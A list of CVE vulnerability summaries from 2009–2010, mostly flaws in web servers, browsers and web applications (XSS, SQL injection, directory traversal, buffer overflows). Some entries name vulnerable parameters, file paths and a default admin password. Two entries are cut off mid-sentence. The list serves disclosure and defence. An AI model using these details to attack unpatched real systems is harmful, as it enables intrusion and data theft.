[CVE-2010-0589] The Web Install ActiveX control (CSDWebInstaller) in Cisco Secure Desktop (CSD) before 3.5.841 does not properly verify the signatures of downloaded programs, which allows remote attackers to force the download and execution of arbitrary files via a crafted web page, aka Bug ID CSCta25876.
[CVE-2010-0582] Cisco IOS 12.1 through 12.4, and 15.0M before 15.0(1)M1, allows remote attackers to cause a denial of service (interface queue wedge) via malformed H.323 packets, aka Bug ID CSCta19962.
[CVE-2010-0571] Unspecified vulnerability in Cisco Digital Media Manager (DMM) 5.0.x and 5.1.x allows remote authenticated users to gain privileges via unknown vectors, and consequently execute arbitrary code via a crafted web application, aka Bug ID CSCtc46008.
[CVE-2010-0570] Cisco Digital Media Manager (DMM) 5.0.x and 5.1.x has a default password for the Tomcat administration account, which makes it easier for remote attackers to execute arbitrary code via a crafted web application, aka Bug ID CSCta03378.
[CVE-2010-0565] Unspecified vulnerability in Cisco ASA 5500 Series Adaptive Security Appliance 7.2 before 7.2(4.45), 8.0 before 8.0(4.44), 8.1 before 8.1(2.35), and 8.2 before 8.2(1.10), allows remote attackers to cause a denial of service (page fault and device reload) via a malformed DTLS message, aka Bug ID CSCtb64913 and "WebVPN DTLS Denial of Service Vulnerability."
[CVE-2010-0563] The Single Sign-on (SSO) functionality in IBM WebSphere Application Server (WAS) 7.0.0.0 through 7.0.0.8 does not recognize the Requires SSL configuration option, which might allow remote attackers to obtain sensitive information by sniffing network sessions that were expected to be encrypted.
[CVE-2010-0556] browser/login/login_prompt.cc in Google Chrome before 4.0.249.89 populates an authentication dialog with credentials that were stored by Password Manager for a different web site, which allows user-assisted remote HTTP servers to obtain sensitive information via a URL that requires authentication, as demonstrated by a URL in the SRC attribute of an IMG element.
[CVE-2010-0554] The HTTP Authentication implementation in Geo++ GNCASTER 1.4.0.7 and earlier uses the same nonce for all authentication, which allows remote attackers to hijack web sessions or bypass authentication via a replay attack.
[CVE-2010-0548] Multiple unspecified vulnerabilities in the Network Controller and Web Server in Xerox WorkCentre 5632, 5638, 5645, 5655, 5665, 5675, and 5687 allow remote attackers to (1) access mailboxes via unknown vectors that bypass Scan to Mailbox authorization or (2) read device configuration information via unknown vectors that bypass web server authorization.
[CVE-2010-0544] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to a malformed URL.
[CVE-2010-0541] Cross-site scripting (XSS) vulnerability in the WEBrick HTTP server in Ruby in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote attackers to inject arbitrary web script or HTML via a crafted URI that triggers a UTF-7 error page.
[CVE-2010-0534] Wiki Server in Apple Mac OS X 10.6 before 10.6.3 does not enforce the service access control list (SACL) for weblogs during weblog creation, which allows remote authenticated users to publish content via HTTP requests.
[CVE-2010-0488] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability."
[CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability."
[CVE-2010-0475] Cross-site scripting (XSS) vulnerability in esp/editUser.esp in the Palo Alto Networks firewall 3.0.x before 3.0.9 and 3.1.x before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the role parameter.
[CVE-2010-0471] SQL injection vulnerability in the comment submission interface (includes/comment.php) in Enano CMS before 1.0.6pl1 allows remote attackers to execute arbitrary SQL commands via unspecified parameters.
[CVE-2010-0470] Cross-site scripting (XSS) vulnerability in scvrtsrv.cmd in Comtrend CT-507IT ADSL Router allows remote attackers to inject arbitrary web script or HTML via the srvName parameter.
[CVE-2010-0468] Cross-site scripting (XSS) vulnerability in utilities/longproc.cfm in PaperThin CommonSpot Content Server allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2010-0465] Cross-site scripting (XSS) vulnerability in the online Documents functionality in SugarCRM 5.2.x before 5.2.0l and 5.5.x before 5.5.0a allows remote authenticated users to inject arbitrary web script or HTML via the Document Name field.
[CVE-2010-0464] Roundcube 0.3.1 and earlier does not request that the web browser avoid DNS prefetching of domain names contained in e-mail messages, which makes it easier for remote attackers to determine the network location of the webmail user by logging DNS requests.
[CVE-2010-0463] Horde IMP 4.3.6 and earlier does not request that the web browser avoid DNS prefetching of domain names contained in e-mail messages, which makes it easier for remote attackers to determine the network location of the webmail user by logging DNS requests.
[CVE-2010-0460] Multiple cross-site scripting (XSS) vulnerabilities in staff/index.php in Kayako SupportSuite 3.60.04 and earlier allow remote authenticated users to inject arbitrary web script or HTML via the (1) subject parameter and (2) contents parameter (aka body) in an insertquestion action. NOTE: some of these details are obtained from third party information.
[CVE-2010-0455] Cross-site scripting (XSS) vulnerability in forum/viewtopic.php in PunBB 1.3 allows remote attackers to inject arbitrary web script or HTML via the pid parameter.
[CVE-2010-0452] Multiple cross-site scripting (XSS) vulnerabilities in HP Project and Portfolio Management Center (PPMC, formerly Mercury IT Governance) 7.1 through SP10 and 7.5 through SP3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0449] Cross-site scripting (XSS) vulnerability in HP SOA Registry Foundation 6.63 and 6.64 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2010-0447] The helpmanager servlet in the web server in HP OpenView Performance Insight (OVPI) 5.4 and earlier does not properly authenticate and validate requests, which allows remote attackers to execute arbitrary commands via vectors involving upload of a JSP document.
[CVE-2010-0446] Unspecified vulnerability on the HP DreamScreen 100 and 130 with firmware before 1.6.0.0, when using a web-connected configuration, allows remote attackers to obtain sensitive information via unknown vectors.
[CVE-2010-0437] The ip6_dst_lookup_tail function in net/ipv6/ip6_output.c in the Linux kernel before 2.6.27 does not properly handle certain circumstances involving an IPv6 TUN network interface and a large number of neighbors, which allows attackers to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact via unknown vectors.
[CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
[CVE-2010-0389] The admin server in Sun Java System Web Server 7.0 Update 6 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an HTTP request that lacks a method token.
[CVE-2010-0388] Format string vulnerability in the WebDAV implementation in webservd in Sun Java System Web Server 7.0 Update 6 allows remote attackers to cause a denial of service (daemon crash) and possibly have unspecified other impact via format string specifiers in the encoding attribute of the XML declaration in a PROPFIND request.
[CVE-2010-0387] Multiple heap-based buffer overflows in (1) webservd and (2) the admin server in Sun Java System Web Server 7.0 Update 7 allow remote attackers to cause a denial of service (daemon crash) and possibly have unspecified other impact via a long string in an "Authorization: Digest" HTTP header.
[CVE-2010-0376] Cross-site scripting (XSS) vulnerability in product_list.php in JCE-Tech PHP Calendars, downloaded 2010-01-11, allows remote attackers to inject arbitrary web script or HTML via the cat parameter. NOTE: this issue is reportedly resultant from a forced SQL error message that occurs from exploitation of CVE-2010-0375.
[CVE-2010-0374] Cross-site scripting (XSS) vulnerability in the Marketplace (com_marketplace) component 1.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the catid parameter in a show_category action to index.php.
[CVE-2010-0371] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Hitmaaan Gallery 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) gall and (2) levela parameters.
[CVE-2010-0370] Cross-site scripting (XSS) vulnerability in the Node Blocks module 5.x-1.1 and earlier, and 6.x-1.3 and earlier, a module for Drupal, allows remote authenticated users, with permissions to create or edit content and administer blocks, to inject arbitrary web script or HTML via the edit-title parameter (aka block title).
[CVE-2010-0365] Cross-site scripting (XSS) vulnerability in search.php in BitScripts Bits Video Script 2.04 and 2.05 Gold Beta allows remote attackers to inject arbitrary web script or HTML via the order parameter.
[CVE-2010-0363] Cross-site scripting (XSS) vulnerability in Zeus Web Server before 4.3r5, when SSL is enabled for the admin server, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2002-1785.
[CVE-2010-0362] Zeus Web Server before 4.3r5 does not use random transaction IDs for DNS requests, which makes it easier for remote attackers to spoof DNS responses.
[CVE-2010-0361] Stack-based buffer overflow in the WebDAV implementation in webservd in Sun Java System Web Server (aka SJWS) 7.0 Update 7 allows remote attackers to cause a denial of service (daemon crash) and possibly have unspecified other impact via a long URI in an HTTP OPTIONS request.
[CVE-2010-0360] Sun Java System Web Server (aka SJWS) 7.0 Update 7 allows remote attackers to overwrite memory locations in the heap, and discover the contents of memory locations, via a malformed HTTP TRACE request that includes a long URI and many empty headers, related to an "overflow." NOTE: this might overlap CVE-2010-0272 and CVE-2010-0273.
[CVE-2010-0359] Buffer overflow in the SSLv2 support in Zeus Web Server before 4.3r5 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long string in an invalid Client Hello message.
[CVE-2010-0357] Cross-site scripting (XSS) vulnerability in the Login page in IBM Lotus Web Content Management (WCM) 6.0.1.4, 6.0.1.5, and 6.0.1.6 before iFix 32
[CVE-2010-0349] Cross-site scripting (XSS) vulnerability in C3 Corp. WebCalenderC3 0.32 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: this issue could not be reproduced by the vendor, but a patch was provided anyway. The original researcher is reliable.
[CVE-2010-0348] Directory traversal vulnerability in C3 Corp. WebCalenderC3 0.32 and earlier allows remote attackers to read arbitrary files via unknown vectors.
[CVE-2010-0347] Cross-site scripting (XSS) vulnerability in the VD / Geomap (vd_geomap) extension 0.3.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0346] Cross-site scripting (XSS) vulnerability in the Tip many friends (mimi_tipfriends) extension 0.0.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0345] Cross-site scripting (XSS) vulnerability in the Majordomo extension 1.1.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0335] Cross-site scripting (XSS) vulnerability in the Vote rank for news (vote_for_tt_news) extension 1.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0331] Cross-site scripting (XSS) vulnerability in the TV21 Talkshow (tv21_talkshow) extension 1.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0328] Cross-site scripting (XSS) vulnerability in the Unit Converter (cs2_unitconv) extension 1.0.4 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0327] Cross-site scripting (XSS) vulnerability in the KJ: Imagelightbox (kj_imagelightbox2) extension 2.0.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-2490.
[CVE-2010-0326] Cross-site scripting (XSS) vulnerability in the Developer log (devlog) extension 2.9.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0321] Cross-site scripting (XSS) vulnerability in jobs/index.php in Jamit Job Board 3.0 allows remote attackers to inject arbitrary web script or HTML via the post_id parameter.
[CVE-2010-0320] Cross-site scripting (XSS) vulnerability in submitlink.php in Glitter Central Script allows remote attackers to inject arbitrary web script or HTML via the catid parameter.
[CVE-2010-0319] Cross-site scripting (XSS) vulnerability in index.php in Docmint 1.0 and 2.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-0315] WebKit before r53607, as used in Google Chrome before 4.0.249.89, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets[0].href property value, related to an IFRAME element.
[CVE-2010-0314] Apple Safari allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets[0].href property value.
[CVE-2010-0302] Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS before 1.4.4, when kqueue or epoll is used, allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3553.
[CVE-2010-0276] IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 does not properly handle navigation of the "Try Lotus iNotes anyway" link from the page that reports use of an unsupported browser, which has unspecified impact and attack vectors, aka SPR LSHR7TBMQU.
[CVE-2010-0275] Ultra-light Mode in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 does not properly handle script commands in the status-alerts URL, which has unspecified impact and attack vectors, aka SPR LSHR7TBM58.
[CVE-2010-0274] Unspecified vulnerability in the Edit Contact scene in Ultra-light Mode in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 has unknown impact and attack vectors, aka SPR LSHR7TBLY5.
[CVE-2010-0273] Unspecified vulnerability in Sun Java System Web Server 7.0 Update 6 on Linux allows remote attackers to execute arbitrary code by sending a process memory address and crafted data to TCP port 80, as demonstrated by the vd_sjws2 module in VulnDisco. NOTE: as of 20100106, this disclosure has no actionable information. However, because the VulnDisco author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
[CVE-2010-0272] Heap-based buffer overflow in Sun Java System Web Server 7.0 Update 6 on Linux allows remote attackers to discover process memory locations via crafted data to TCP port 80, as demonstrated by the vd_sjws2 module in VulnDisco. NOTE: as of 20100106, this disclosure has no actionable information. However, because the VulnDisco author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
[CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability."
[CVE-2010-0230] SUSE Linux Enterprise 10 SP3 (SLE10-SP3) and openSUSE 11.2 configure postfix to listen on all network interfaces, which might allow remote attackers to bypass intended access restrictions.
[CVE-2010-0220] The nsObserverList::FillObserverArray function in xpcom/ds/nsObserverList.cpp in Mozilla Firefox before 3.5.7 allows remote attackers to cause a denial of service (application crash) via a crafted web site that triggers memory consumption and an accompanying Low Memory alert dialog, and also triggers attempted removal of an observer from an empty observers array.
[CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
[CVE-2010-0190] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0189] A certain ActiveX control in NOS Microsystems getPlus Download Manager (aka DLM or Downloader) 1.5.2.35, as used in Adobe Download Manager, improperly validates requests involving web sites that are not in subdomains, which allows remote attackers to force the download and installation of arbitrary programs via a crafted name for a download site.
[CVE-2010-0172] toolkit/components/passwordmgr/src/nsLoginManagerPrompter.js in the asynchronous Authorization Prompt implementation in Mozilla Firefox 3.6 before 3.6.2 does not properly handle concurrent authorization requests from multiple web sites, which might allow remote web servers to spoof an authorization dialog and capture credentials by demanding HTTP authentication in opportunistic circumstances.
[CVE-2010-0162] Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, and SeaMonkey before 2.0.3, does not properly support the application/octet-stream content type as a protection mechanism against execution of web script in certain circumstances involving SVG and the EMBED element, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via an embedded SVG document.
[CVE-2010-0160] The Web Worker functionality in Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, and SeaMonkey before 2.0.3, does not properly handle array data types for posted messages, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors.
[CVE-2010-0155] CRLF injection vulnerability in load.php in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5 allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the javaVersion parameter.
[CVE-2010-0154] Directory traversal vulnerability in sla/index.php in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the l parameter, related to an "Insecure Direct Object Reference vulnerability."
[CVE-2010-0153] Multiple cross-site request forgery (CSRF) vulnerabilities in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5.0.2 allow remote attackers to hijack the authentication of administrators for requests that (1) change settings or (2) conduct denial of service attacks.
[CVE-2010-0144] Unspecified vulnerability in the WebSafe DistributorServlet in the embedded HTTPS server on the Cisco IronPort Encryption Appliance 6.2.x before 6.2.9.1 and 6.5.x before 6.5.2, and the IronPort PostX MAP before 6.2.9.1, allows remote attackers to read arbitrary files via unknown vectors, aka IronPort Bug 65922.
[CVE-2010-0143] Unspecified vulnerability in the administrative interface in the embedded HTTPS server on the Cisco IronPort Encryption Appliance 6.2.x before 6.2.9.1 and 6.5.x before 6.5.2, and the IronPort PostX MAP before 6.2.9.1, allows remote attackers to read arbitrary files via unknown vectors, aka IronPort Bug 65921.
[CVE-2010-0132] Cross-site scripting (XSS) vulnerability in ViewVC 1.1 before 1.1.5 and 1.0 before 1.0.11, when the regular expression search functionality is enabled, allows remote attackers to inject arbitrary web script or HTML via vectors related to "search_re input," a different vulnerability than CVE-2010-0736.
[CVE-2010-0123] The database backup implementation in Employee Timeclock Software 0.99 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for a "semi-predictable file name."
[CVE-2010-0115] SQL injection vulnerability in login.php in the GUI management console in Symantec Web Gateway 4.5 before 4.5.0.376 allows remote attackers to execute arbitrary SQL commands via the USERNAME parameter.
[CVE-2010-0112] Multiple SQL injection vulnerabilities in the Administrative Interface in the IIS extension in Symantec IM Manager before 8.4.16 allow remote attackers to execute arbitrary SQL commands via (1) the rdReport parameter to rdpageimlogic.aspx, related to the sGetDefinition function in rdServer.dll, and SQL statements contained within a certain report file
[CVE-2010-0090] Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18 allows remote attackers to affect integrity and availability via unknown vectors.
[CVE-2010-0089] Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect availability via unknown vectors.
[CVE-2010-0087] Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2010-0078] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2MP3, 10.0MP2, and 10.3.1 allows remote attackers to affect availability via unknown vectors.
[CVE-2010-0074] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0SP7, 8.1SP6, 9.0, 9.1, 9.2MP3, 10.0MP2, and 10.3.1 allows remote attackers to affect availability via unknown vectors.
[CVE-2010-0073] Unspecified vulnerability in the WebLogic Server in Oracle WebLogic Server 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, and 10.3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2010-0069] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0, SP7, 8.1SP6, 9.0, 9.1, 9.2MP3, 10.0MP1, and 10.3.0 allows remote attackers to affect integrity via unknown vectors.
[CVE-2010-0068] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2MP2, and 10.0 allows remote attackers to affect confidentiality via unknown vectors.
[CVE-2010-0063] Incomplete blacklist vulnerability in CoreTypes in Apple Mac OS X before 10.6.3 makes it easier for user-assisted remote attackers to execute arbitrary JavaScript via a web page that offers a download with a Content-Type value that is not on the list of possibly unsafe content types for Safari, as demonstrated by the values for the (1) .ibplugin and (2) .url extensions.
[CVE-2010-0054] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving HTML IMG elements.
[CVE-2010-0053] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the run-in Cascading Style Sheets (CSS) display property.
[CVE-2010-0052] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to "callbacks for HTML elements."
[CVE-2010-0051] WebKit in Apple Safari before 4.0.5 does not properly validate the cross-origin loading of stylesheets, which allows remote attackers to obtain sensitive information via a crafted HTML document. NOTE: this might overlap CVE-2010-0651.
[CVE-2010-0050] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.
[CVE-2010-0049] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via HTML elements with right-to-left (RTL) text directionality.
[CVE-2010-0048] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted XML document.
[CVE-2010-0047] Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to "HTML object element fallback content."
[CVE-2010-0046] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted format arguments.
[CVE-2010-0044] PubSub in Apple Safari before 4.0.5 does not properly implement use of the Accept Cookies preference to block cookies, which makes it easier for remote web servers to track users by setting a cookie in a (1) RSS or (2) Atom feed.
[CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability."
[CVE-2010-0005] query.py in the query interface in ViewVC before 1.1.3 does not reject configurations that specify an unsupported authorizer for a root, which might allow remote attackers to bypass intended access restrictions via a query.
[CVE-2009-5132] The Filtering Service in Websense Web Security and Web Filter before 6.3.1 Hotfix 106 and 7.x before 7.1 allows remote attackers to cause a denial of service (filtering outage) via a crafted URL.
[CVE-2009-5131] The Receive Service in Websense Email Security before 7.1 does not recognize domain extensions in the blacklist, which allows remote attackers to bypass intended access restrictions and send e-mail messages via an SMTP session.
[CVE-2009-5130] The Rules Service in Websense Email Security before 7.1 allows remote attackers to cause a denial of service (service crash) via an attachment with a crafted size.
[CVE-2009-5129] The Websense V10000 appliance before 1.0.1 allows remote attackers to cause a denial of service (intermittent LDAP authentication outage) via a login attempt with an incorrect password.
[CVE-2009-5128] The Websense V10000 appliance before 1.0.1 allows remote attackers to cause a denial of service (memory consumption and process crash) via a large file that is not properly handled during buffering.
[CVE-2009-5122] The Personal Email Manager component in Websense Email Security before 7.2 allows remote attackers to obtain potentially sensitive information from the JBoss status page via an unspecified query.
[CVE-2009-5121] Websense Email Security 7.1 before Hotfix 4 allows remote attackers to bypass the sender-based blacklist by using the 8BITMIME EHLO keyword in the SMTP session.
[CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
[CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
[CVE-2009-5117] The Web Post Protection feature in McAfee Host Data Loss Prevention (DLP) 3.x before 3.0.100.10 and 9.x before 9.0.0.422, when HTTP Capture mode is enabled, allows local users to obtain sensitive information from web traffic by reading unspecified files.
[CVE-2009-5114] Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
[CVE-2009-5113] Cross-site scripting (XSS) vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the DOC parameter.
[CVE-2009-5112] wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to obtain the installation path via a crafted request.
[CVE-2009-5111] GoAhead WebServer allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
[CVE-2009-5103] Cross-site scripting (XSS) vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable.
[CVE-2009-5101] Pentaho BI Server 1.7.0.1062 and earlier includes the session ID (JSESSIONID) in the URL, which allows attackers to obtain it from session history, referer headers, or sniffing of web traffic.
[CVE-2009-5100] Pentaho BI Server 1.7.0.1062 and earlier does not set the autocomplete tag to off on web pages using a password field, which might allow physically proximate attackers to obtain the password.
[CVE-2009-5099] Cross-site scripting (XSS) vulnerability in ViewAction in Pentaho BI Server 1.7.0.1062 and earlier allows remote attackers to inject arbitrary web script or HTML via the outputType parameter.
[CVE-2009-5098] The LunaSysMgr process in Palm Pre WebOS 1.1 and earlier, when not viewing web pages in landscape mode, allows remote attackers to cause a denial of service (crash) via a web page containing a long string following a refresh tag, which triggers a floating point exception.
[CVE-2009-5097] Palm Pre WebOS 1.1 and earlier processes JavaScript in email messages, which allows remote attackers to execute arbitrary JavaScript, as demonstrated by reading PalmDatabase.db3.
[CVE-2009-5096] Cross-site scripting (XSS) vulnerability in the Flag Content module 5.x-2.x before 5.x-2.10 for Drupal allows remote attackers to inject arbitrary web script or HTML via the Reason parameter.
[CVE-2009-5086] Cross-site scripting (XSS) vulnerability in Appliance Configuration Manager (ACM) in Juniper IDP 4.1 before 4.1r3 and 4.2 before 4.2r1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-5071] Unspecified vulnerability in Palm Pre WebOS before 1.2.1 has unknown impact and attack vectors related to an "included contact template file."
[CVE-2009-5067] Directory traversal vulnerability in html2ps before 1.0b6 allows remote attackers to read arbitrary files via a .. (dot dot) in the "include file" SSI directive. NOTE: this issue might be a vulnerability only in limited scenarios, such as if html2ps is invoked by a web application, or if a user-assisted attacker provides filenames whose contents could cause a denial of service, such as certain devices.
[CVE-2009-5065] Cross-site scripting (XSS) vulnerability in feedparser.py in Universal Feed Parser (aka feedparser or python-feedparser) before 5.0 allows remote attackers to inject arbitrary web script or HTML via vectors involving nested CDATA stanzas.
[CVE-2009-5020] Open redirect vulnerability in awredir.pl in AWStats before 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2009-5019] Web Wiz NewsPad stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/NewsPad.mdb.
[CVE-2009-5000] Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 4.0.2.x before 4.0.2.3-P8AE-FP003 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to .jsp pages.
[CVE-2009-4999] Cross-site scripting (XSS) vulnerability in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-016 allows remote attackers to inject arbitrary web script or HTML via the Name field.
[CVE-2009-4995] Cross-site scripting (XSS) vulnerability in frmTickets.aspx in SmarterTools SmarterTrack before 4.0.3504 allows remote attackers to inject arbitrary web script or HTML via the email address field. NOTE: the provenance of this information is unknown.
[CVE-2009-4994] Cross-site scripting (XSS) vulnerability in frmKBSearch.aspx in SmarterTools SmarterTrack before 4.0.3504 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2009-4991] Cross-site scripting (XSS) vulnerability in users/resume_register.php in Omnistar Recruiting allows remote attackers to inject arbitrary web script or HTML via the job2 parameter.
[CVE-2009-4990] Cross-site scripting (XSS) vulnerability in the Webform report module 5.x and 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via a submission.
